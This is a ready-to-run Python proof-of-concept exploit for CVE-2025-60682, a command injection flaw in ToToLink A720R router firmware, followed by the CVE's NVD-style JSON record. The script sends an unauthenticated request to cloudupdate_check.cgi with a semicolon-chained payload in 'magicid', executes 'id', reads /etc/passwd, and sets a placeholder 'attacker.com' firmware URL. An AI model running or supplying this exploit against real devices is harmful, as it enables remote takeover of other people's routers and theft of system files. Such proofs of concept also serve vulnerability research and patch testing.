CVE-2025-60682

#!/usr/bin/env python3 # CVE-2025-60682 PoC - ToToLink A720R Command Injection # Affected: ToToLink A720R Router Firmware V4.1.5cu.614_B20230630 import requests import sys TARGET_IP = "192.168.1.1" # Router IP address TARGET_PORT = 80 def exploit_command_injection(target_ip, command): """ Exploit the command injection vulnerability in cloudupdate_check via magicid and url parameters """ # Construct malicious payload # Using semicolon to chain commands payload = f";{command}" # Target URL for cloud update check url = f"http://{target_ip}:{TARGET_PORT}/cgi-bin/cloudupdate_check.cgi" # Prepare malicious parameters params = { "magicid": payload, "url": "http://attacker.com/firmware.bin" } try: # Send exploit request (unauthenticated) response = requests.get(url, params=params, timeout=10) print(f"[*] Request sent to {url}") print(f"[*] Payload: {payload}") print(f"[*] Response status: {response.status_code}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None def main(): if len(sys.argv) > 1: target_ip = sys.argv[1] else: target_ip = TARGET_IP print("[*] CVE-2025-60682 - ToToLink A720R Command Injection") print(f"[*] Target: {target_ip}") # Example: Execute 'id' command to verify vulnerability print("\n[*] Testing with 'id' command...") result = exploit_command_injection(target_ip, "id") if result: print(f"[+] Response received") # Example: Read /etc/passwd print("\n[*] Reading /etc/passwd...") result = exploit_command_injection(target_ip, "cat /etc/passwd") if result: print(result) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-60682", "sourceIdentifier": "[email protected]", "published": "2025-11-13T16:15:52.080", "lastModified": "2025-11-17T19:16:58.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the ToToLink A720R Router firmware V4.1.5cu.614_B20230630 within the cloudupdate_check binary, specifically in the sub_402414 function that handles cloud update parameters. User-supplied 'magicid' and 'url' values are directly concatenated into shell commands and executed via system() without any sanitization or escaping. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:a720r_firmware:4.1.5cu.614_b20230630:*:*:*:*:*:*:*", "matchCriteriaId": "BCA249C9-68D4-48FE-B0CA-77ECF53DDE3B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:a720r:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1DE5168-B787-462C-B024-2B8F73759034"}]}]}], "references": [{"url": "http://totolink.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-A720R/CVE-2025-60682.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.totolink.net/", "source": "[email protected]", "tags": ["Product"]}]}}